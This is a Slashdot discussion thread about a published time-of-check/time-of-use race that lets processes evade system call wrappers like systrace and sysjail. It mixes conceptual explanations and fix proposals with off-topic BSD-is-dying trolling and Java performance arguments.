Well, the fix for now appears to be don't use the vulnerable software, but considering that the vulnerability allows you to break the software such that it behaves as if it wasn't running, I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check. Also, if it was something simple like a buffer overrun that would be trivial to patch, but because of the way this particular vulnerability functions (concurrency attack) there's not simple solution. Some have suggested pushing the code to kernel space, but as they've also pointed out, that's rather risky in its own regard. Short of some kind of provision in the kernel to prevent the attacks I'm not sure how this could be fixed (although I haven't seen to many details, just that it involves re-writing some args after they've already been scanned by systrace).

Re:fix shedules ?

[TubeSteak]

as usual I would assume *bsd to put out fixes quite timely... FTFA: All affected vendors received at least six months, and in some cases many years advance notice regarding these vulnerabilities.

Re:fix shedules ?

[peacefinder]

"I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check"

It'll be interesting to see what the tradeoff is: does the system become more vulnerable overall by using the vulnerable software, or less? Has the layer of security it was supposed to add become another exploit path that's worse than what it was supposed to protect against?

My off-the-cuff inexpert guess is that it will still be valuable for some limited situations, but that in many cases it'll reduce the overall security of the system. I'm looking forward to hearing more from the various teams involved.

Re:fix shedules ?

[orclevegam]

My off-the-cuff inexpert guess is that it will still be valuable for some limited situations, but that in many cases it'll reduce the overall security of the system. I'm looking forward to hearing more from the various teams involved.

Well, if I'm understanding the exploit properly, and the purpose of systrace, I can see both for and against. It's essentially there to allow an application to run at least privileges unless it wants to access a specific resource, and then to only be promoted for the duration of that request. The alternative to this is to run an application with elevated (normal in the case of most applications, few require root) privileges all the time. Now, depending on how the privilege escalation is implemented, this is either harmless, or very dangerous. If they promote to a level required to access a resource based on the initially granted status, this isn't bad as the program would only have permissions to access what it normally would be allowed to anyway, you just get less warning because you won't get a popup if it tries to access something it still has permission to, but which is unexpected based on its access policy. If on the other hand, it's promoted to maximum privilege whenever the request is approved this is very dangerous because it could for instance request permission to modify some innocuous file, then change it after the fact to modify /etc/passwd.

"cambrige researcher"...

[diegocgteleline.es]

...and he's also one of the most important FreeBSD hackers.

Re:"cambrige researcher"...

[chrisgagne]

He's probably one of the *only* FreeBSD hackers.

Re:"cambrige researcher"...

Excuse me, but I think teh linux is calling you...

Re:Linux?

[Noryungi]

Yes, M. Watson also attacked equivalent programs (GSWTK) under Linux successfully.

Read his blog post, as some of the techniques described are quite interesting. Too bad we can't read the full paper.

Article?

[Leafheart]

Site is slashdotted, anyone got a copy of the article?

Re:Article?

By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

Or have I just been lucky?

Re:Article?

Are the webservers better now, or has the power of slashdot effect declined? Or have I just been lucky?

Yes.

Re:Article?

[jjrockman]

Nah, it's just that nobody RTFA anymore.

Re:Article?

[RockoTDF]

No, the power of the digg effect has gone up.

Re:Article?

[iknowcss]

What do you mean by "anymore."

Re:Article?

[cp.tar]

By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

Or have I just been lucky?

It is now known as the Slashdot Quantum Paradox.

Previously, the Slashdot Paradox meant that although nobody ever read TFA, the servers were still swarmed and brought down to their knees by the sheer force of discussion.

Nowadays, due to several breakthroughs in quantum science and technology, the Slashdot Quantum Paradox ensures that as long as nobody actually goes to RTFA, the servers stay online. However, should anybody actually go and try to RTFA, the Slashdot Effect would affect it in full.

Since you are an Anonymous Coward, you're practically nobody; you went to RTFA and the server was, of course, online.

See?

Re:Why???

[orclevegam]

Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

MOD PARENT DOWN!!

This is frickin' stupid. Nice try at ripping off the CARRIER LOST template, but you should at least copy and paste it if you don't understand where it came from.

Re:Linux?

[x_MeRLiN_x]

Would you be talking about this?

problem affects a variety of software

This class of problem potentially affects a variety of software. Systrace (which runs on Linux, NetBSD, OpenBSD, Darwin, etc) was given as one example of software that is affected. Even Sun's Dtrace might be vulnerable.

Re:problem affects a variety of software

No, DTrace is most certainly *not* vulnerable. See:
http://www.opensolaris.org/jive/thread.jspa?thread ID=36929&tstart=0 ...for why this is.

Re:Why???

[ettlz]

Clarification:

Why do you think physicists spend all that time and

other people's

money on particle accelerators?

;) (Well, I'm a theorist, so make of it what you will...)

Re:Well

In other news, no but middle managers cares what Netcraft has to say about OS usage.

This is exactly why I love OpenBSD!

[amper]

The very fact that the OpenBSD project makes itself such a huge target for would-be hackers is what makes it almost certain that any vulnerabilities will be found and patched. No handwringing is necessary here, though quite a lot of recoding may be involved. We can all look forward to an even more secure OpenBSD very soon. Keep up the good work, everyone!

Re:This is exactly why I love OpenBSD!

[DrSkwid]

Nah, OS X exploits are where the kudos is at. You don't get death threats from Theo

Re:This is exactly why I love OpenBSD!

Well considering they have known about these holes for years I'm not that impressed.

There should have already been a fix in there a long time ago.

OF - Hey, I know what supposed to be behind this..

I know what supposed to be behind this roof!

It's a view of my City!

I'm not kidding, picture taken from http://en.wikipedia.org/wiki/Chillon looking at my City http://en.wikipedia.org/wiki/Montreux

It's freakin' Swiss Day on slashdot or what ? next article is going to be about a red cross on a white flag... oh wait

USENIX Workshop On Offensive Technology

[Moniker42]

USENIX Workshop On Offensive Technology spells umm... woot?

*checks the date*

well, it's not April 1st ;)

So they can break someone *else's*!

Failure during Cern magnet test :-)

Re:The beauty of open source

I thought the beauty of open source was that the code was constantly reviewed by a million eyes so that bugs like this would either never occur or would be discovered quickly (rather than years after the fact). I guess that was complete bullshit.

Am I missing something?

[Ancient_Hacker]

Am I missing something?

Isn't it well known that you should not validate some data that the user might still be able to modify? That's security 101.

What's the problem with copying parameters to some memory space that the user can't reach, like the system heap? Surely moving a few bytes isn't going to be a big performance hit, compared to the time it takes to validate parameters.

Re:Linux?

[Noryungi]

Correct. I only found the link after surfing to his web site.

OpenBSD's man page for systrace mentions this?

[cgdae]

OpenBSD's systrace manpage appears to mention this problem in the BUGS section:

Applications that use clone()-like system calls to share the complete address space between processes may be able to replace system call arguments after they have been evaluated by systrace and escape policy enforcement.

Or see http://www.openbsd.org/cgi-bin/man.cgi?query=systr ace&apropos=0&sektion=0&manpath=OpenBSD+Current&ar ch=i386&format=html

Re:OpenBSD's man page for systrace mentions this?

That note is in the man page because Robert Watson pointed out the bug several years ago -- however, the note is incorrect. It asserts that threading (clone) is required, but part of the point of the paper is that you don't even need threading to exploit this. The issue here is not that there can't be work arounds, but that to fix the fundamental issue here, the way system calls handle arguments has to be fundamentally changed: the system has to become message-passing.

Re:OpenBSD's man page for systrace mentions this?

[widman]

All the Linux fan-boy trolling posts get high scores, this guy only 1?

m0n0wall /pfsense?

[atarione]

hey could someone do me a favor and tell me if m0n0wall or Pfsense ... are vulnerable to this?

Re:m0n0wall /pfsense?

What the hell else are you running on a monowall/pfsense machine that is systrace'd?

Re:Linux?

[Hawke]

The presentation covers it pretty well. At least the GSWTK attack.

(It's a straight forward time-of-use vs. time-of-check attack. And we were at least partially aware of it when we wrote GSWTK. The problem is that the original system calls require memory in the processes space, so you can't just copy in the string after you validate it to keep the process from changing it. I wrote some methods for Linux that allocated extra pages in the processes memory space so we could copy in the string, but that just makes the attack harder via obscurity. It doesn't address the fundamental issue at all.)

Re:Why???

[snoyberg]

Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

For a second on reading that, I saw "psychologists" instead of "physicists." Gave a very different meaning...

Re:Why???

[orclevegam]

For a second on reading that, I saw "psychologists" instead of "physicists." Gave a very different meaning...

I see, very interesting... and what does this inkblot look like to you?

The quick explanation

This is actually a long-known kernel problem, namely that once you have threads, you can't rely on user buffers to remain constant. So you MUST copy the buffers into kernel space ONCE, and validate and trust only the copy.

If you validate and trust the user buffer, a second thread sharing the same address space can change the buffer between the two steps, leading to trusting invalid data, which leads to Bad Things.

But some applications are trying to "wrap" system calls, validating the parameters before letting the system call proceed, and they're running into the same problems. It's more of a challenge for a wrapper, because there's no "safe" place to copy the parameters to.

In any case, this is not a kernel vulnerability, but an overoptimistic application vulnerability.

Re:The quick explanation

This doesn't require threads, just shared memory. You don't even need to use explicit shared memory (like shmem or mmap) constructs, you could just do it with /proc if you wanted to. I suspect a debugger would also make this sort of attack easy.

dom

But if sudo isn't secure...

[Gazzonyx]

So... how do you patch your system without escalating from a normal user?

Re:So much for security

Hey, asshat! In case you missed it, the vulnerability affects Windows anti-virus products, too.

OpenBSD record: Good

[widman]

The only meaningful bug they had lately was the IPV6 mbuf. And even that one obviously affected only people using IPv6.

This race bug was known for ages. It's even hinted in the man page. Stop the FUD.

Re:OpenBSD record: Good

Fact: OpenBSD is dying.

Nuff said.

Attn: slashdot editors

It would be nice if the parent comment (or a link to it) was placed in the article summary. The sudo application and the above comment dismissing concern over current releases is probably important enough to warrent this.

Thanks :)
umeboshi (not logged in)

Sysjail is really just one guy

[raddan]

Kristaps Dzonsons. And I'm not sure if he ever really intended for it to be for production use. I saw his talk at NYCBSDCon last year, and my impression was "here's a neat tool I'm working on guys, I'm still working out a lot of things, come play if you want". Not that this isn't an important vulnerability to address-- but I'd be surprised if anyone was currently using sysjail in an important production role.

Lights out, Pard

Somewhere in a lonely hospital room, *BSD is dying.

"BSD? It's dead, Jim . . . "

Hahaha!

Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
$#%#^&&!#$@$

[CONNNECTION LOST]

Don't use dev tools as security tools...

[Anti-Trend]

...that's essentially what the presenter is saying. The 'chroot' style jail is essentially a fake system root designed for development purposes, so you can have a little fake clean-room environment in which to build. Later, this concept was adapted for security purposes -- hence systrace, sysjail... What he's suggesting is that this userland approach is easily circumvented, and the best approach would be to use a mandatory access control approach at the kernel level, ala SELinux. To me, it's not so much that these programs are vulnerable as they are ineffective as security tools. I'm glad this is getting some publicity and opening a few eyes. Not to say that SELinux is the do-all end-all be-all of security, rather that false security is sometimes worse than no security.

Undeadly coverage

[zyche]

Coverage on Undeadly.

To answer some anti-OpenBSD bias from the summary above: systrace is really Niels Provos toy, OpenBSD just includes it in the base install just as NetBSD does; regarding sudo, it has been addressed in a comment above (not vulnerable in the actual released version); and by saying that NetBSD has disabled systrace that implies that OpenBSD has it still enabled. Except that it is a tool that isn't used by the default install at all - you have to enable and configure it yourself. And as the Undeadly post states: Since 2002, the systrace(1) man page included a warning in the BUGS section about the possibility of escaping the policy enforcement because of the behavior of certain system calls..

Personally I have never liked the idea of systrace - leaves way to much to to me as a system administrator to fuck up.

Re:Undeadly coverage

[widman]

I still think systrace is a lot better than nothing. It has minimal performance impact and you can have basic blocks for applications running foreign code (like browsers and mail clients.)

Sure, it's not perfect. I knew that from day 1.

Re:Undeadly coverage

[datastew]

Mods- This is the comment I was looking for and I had to get through half of the comments to find it. Please mod up as I am sure others are interested in the actual OpenBSD response.

Rumours of *BSD Death Premature

[itsybitsy]

Hi,

The rumours of the death of *BSD systems are overblown and premature. The so called facts from the above "anonymous coward" are not facts at all but simply an opinion expressed by someone with an agenda.

If you don't use *BSD why would you care if it's living or dying? Why would you care if it's increasing in market share or declining?

The "anonymous cowards" opinions are irrelevant and likely incorrect anyhow. OpenBSD, NetBSD and FreeBSD are viable systems that have user communities that use them. It's not relevant how large those communities are.

In fact the so called Linux community isn't one community after all since there are reportedly over 300 distributions of systems that use the Linux kernel. So it's really *Linux and each of those distributions would break down to similar small groupings of users.

If your system works for you use it. If it doesn't, then adapt it or choose one that is better suited.

Re:Rumours of *BSD Death Premature

[Slashcrap]

The rumours of the death of *BSD systems are overblown and premature. The so called facts from the above "anonymous coward" are not facts at all but simply an opinion expressed by someone with an agenda.

When I see a BSD user being so defensive in response to one of the World's oldest and most obvious trolls, I can only draw one conclusion - BSD must be dying.

Re:Rumours of *BSD Death Premature

[itsybitsy]

When I see a BSD user being so defensive in response to one of the World's oldest and most obvious trolls, I can only draw one conclusion - BSD must be dying.

And when I see comments such as yours it's obvious that you are the troll. However, even trolls need to be dealt with by a little thing known as a dose of reality.

The only way for *BSD to die is for all it's users to stop using it. That goes for Linux too, or Windows for that matter.

Death of software isn't the same as death of people since when a person dies it's game over for that person - eternal nothingness - non-existence brought to you.

When software dies that means that every copy has been destroyed or rendered unusable.

It's rare that a piece of software to actually die, especially one that is as widely distributed as *BSD. *BSD will live longer than you or your spawn (and their spawn) if you are lucky enough to have any.

All that's premature are your comments. Live long and prosper with whatever system(s) you are using. Oh, yeah, by limiting your system choices you are supporting a homogeneous mono culture and contributing to blandness which can only lead to Idiocracy. With your support we can make the Idiocracy happen much sooner.

Expand your view across the wider horizon that is out there for you to take advantage of: *BSD, Minix 3.x, EROS, MenuetOS, and of course there are these others listed here: http://en.wikipedia.org/wiki/List_of_operating_sys tems.

Then of course there is MacOSX which is a *BSD system with more users than all Linux installations combined; but then we wouldn't want facts to get in the way of your trolling now would we.

So using your logic, since MacOSX has more users than Linux, Linux must be dying. That's just flawed thinking buddy - get a brain and learn critical thinking skills.

How vulnerable are Java apps, and why?

I posted a blog entry about how this applies in Java, with source code, examples of exploits, and an explanation of how Java generally avoids this problem, and another idea of how it could be avoided outside of Java.

Re:How vulnerable are Java apps, and why?

[Ash-Fox]

Let me know when Java applications under the Sun JRE will run as responsive as C, Delphi, C++ applications do or better on the current people's commodity hardware -- WinXP + 256MB RAM + Resource intensive anti-virus software.

And before anyone mentions, no, I'm not interested on benchmarks done on multicore, 12GB RAM machines.

Re:How vulnerable are Java apps, and why?

You just said it yourself: resource-intensive anti-virus software. Java is an alternative to that because the JVM's security architecture has anti-virus capabilities built-in, without needing to be resource-intensive. The anti-virus software that everyone runs these days has a major impact on performance, and it's trying to do the same thing Java does with its sandbox architecture. The difference is that anti-virus software is not nearly as protective as the JVM is, and compiled executable + anti-virus is a lot slower than a Java app.

And by the way, I do most of my work in a 100% Java GUI (Swing) app, which is NetBeans, a large, complicated, powerful IDE, on a regular PC, and it is just as responsive as any other desktop app, and it uses less memory. It runs in less than 100mb, all the time.

Re:How vulnerable are Java apps, and why?

[Ash-Fox]

You just said it yourself: resource-intensive anti-virus software. Java is an alternative to that because the JVM's security architecture has anti-virus capabilities built-in, without needing to be resource-intensive.

One could write a virus in Java too.

The anti-virus software that everyone runs these days has a major impact on performance

Not quite, but certain very common anti-virus software is quite intensive.

and it's trying to do the same thing Java does with its sandbox architecture.

Most resident scanners scan for patterns against their virus databases in active memory. It's rare that heuristic scanning picks up unique viruses.

The difference is that anti-virus software is not nearly as protective as the JVM is

The anti-virus scanner can block known viruses. The Sun JVM doesn't have such functionality. In theory Java is great, because the user gets a dialog on applets/webstart applications to run the application. However, there have been many certificate vulnerabilities with the JVM, there have been vulnerabilities related to executing unsigned java code by the use of certain java bytecode etc.

and compiled executable + anti-virus is a lot slower than a Java app.

Well, this isn't a direct comparison since the code in both of these programs is substantially different but, just looking at some well known programs like utorrent + anti-virus verses Sun JVM + Azuerus, kdevelop (the recent kde related port) verses Sun JVM + netbeans etc. I find the java applications slower responding.

In what cases can I see it's slower? I can see the UIs redrawing, I can see the mouse clicks aren't being handled instantly, I can see the application just freezes somewhat unlike my other applications.

That said, I have seen benchmarks that show reads and writes are faster in Java compared to a C application, but in reality, that's just a small thing for me.

If I find that I can run things like utorrent, kdevelop (with all those kde libs) and anti-virus software without noticing these issues verses the java applications alone, with the anti-virus software disabled... I still notice all the redrawing, latency in my clicks. That in my opinion is not good enough.

And by the way, I do most of my work in a 100% Java GUI (Swing) app, which is NetBeans, a large, complicated, powerful IDE, on a regular PC, and it is just as responsive as any other desktop app,

Can't say the experience has been the same for me. I've messed with Java since 1.1 to 6, I've used various jdks, messed with native java compilers (including those that convert java source to .net bytecode). The alternatives to Sun JDK are always too far behind to run the best/popular java applications I've come across... Freenet, Azureus, Netbeans (although notably, netbeans doesn't run too bad on Sun JVM -- I just notice the UI redrawing).

and it uses less memory. It runs in less than 100mb, all the time.

Memory arguments are somewhat pointless, I could write software to compress data in memory to keep the memory usage smaller, but the side effect is that the application could behave much slower due to this. While unnecessary things shouldn't be in memory, responsiveness on consumer hardware from the interface is far more important.

Too often I see other Java developers, who tell users that their applications are not slow and there is nothing wrong with them, they get these results on their beefed up machine (quite normal for a developer, but bad for testing certain cases if your end user are common people who have 256MB ram, windows xp, crappy intensive anti-virus and who knows what else).

Even now, I look at one of my little side projects under the latest Sun jvm6, verses Sun jvm1.4... I can see clearly there is a lower framerate with i

Re:The beauty of open source

[mrsteveman1]

That only works up to the exact number of users who are both able to read code, and understand it, which is a smaller number than the total user count probably by quite a bit.

The advantage is that users are ABLE to find things like security problems if they look, because the source is open. That doesn't guarantee they will find things, but you can see that it is at least possible.

Re:The beauty of open source

[larry+bagina]

Speaking only for myself, access to source code has let me identify new vulnerabilities a lot faster than black box testing. Easier discovering? Yes. But that doesn't mean the bugs will be reported (I gave up -- too many arrogant programmers that aren't as smart as they think they are), the code fixed, or the users updated.

Re:Why???

[Sibelius]

Well, to be entirely honest, because it's the only way we know how. If we knew a better, cheaper, or faster way, we'd use that, I'm sure. That's not to say that I don't think there is something cool about building the next generation of bigger and more complex detectors, but the conventional wisdom is that after CMS and ATLAS, no one would fund another generation of even bigger accelerator rings and accompanying detectors, so if particle physics has anything left to figure out, they'll have to try one of the newer techniques (wakefield accelerators? ::shrug::).

Re:Why???

[ettlz]

Or CLIC or ILC etc. Well, I ain't complainin', it's a great way to spend government money. And the way I see it, not only does it keep us all in jobs, it's more money that the Illuminati will never be able to use to further immanentise the eschaton.

Systrace.org post on this alleged bug

[widman]

http://www.systrace.org/index.php?/archives/14-Eva ding-System-Sandbox-Containment.html

At WOOT this year, Robert Watson presented a paper on how to evade popular system call interposition systems, including Systrace. For Systrace, Robert noticed that the arguments written to the stackgap could be replaced by a co-operating process after Systrace performed its policy check. The initial prototype of Systrace as described in the paper avoided this problem by using a look-aside buffer in the kernel. This imposes a slight performance penality but I hope that this obvious solution is going to be included in the OpenBSD and NetBSD kernel soon.

Also check the comment by the "Cambridge Researcher", kind of acknowledging it's nothing new.

Re:Systrace.org post on this alleged bug

Robert Watson has stated in his blog that he notified Niels and Theo of this vulnerability in 2002, prior to it even being committed to OpenBSD. And that the comment in the OpenBSD man page was a result of that report. That means Theo knew about this for five years and didn't fix it or remove Systrace!

No it isn't.

Its not a whopper of a hole. Systrace isn't used by anything by default, its a tool you have to configure specifically on a per app basis for that app. And this "vulnerability" has been documented in the systrace man page for years. Systrace isn't supposed to be used for a false sense of security, its supposed to be used for things like stopping poorly written configure/make messes from writing things to places they shouldn't while working on ports.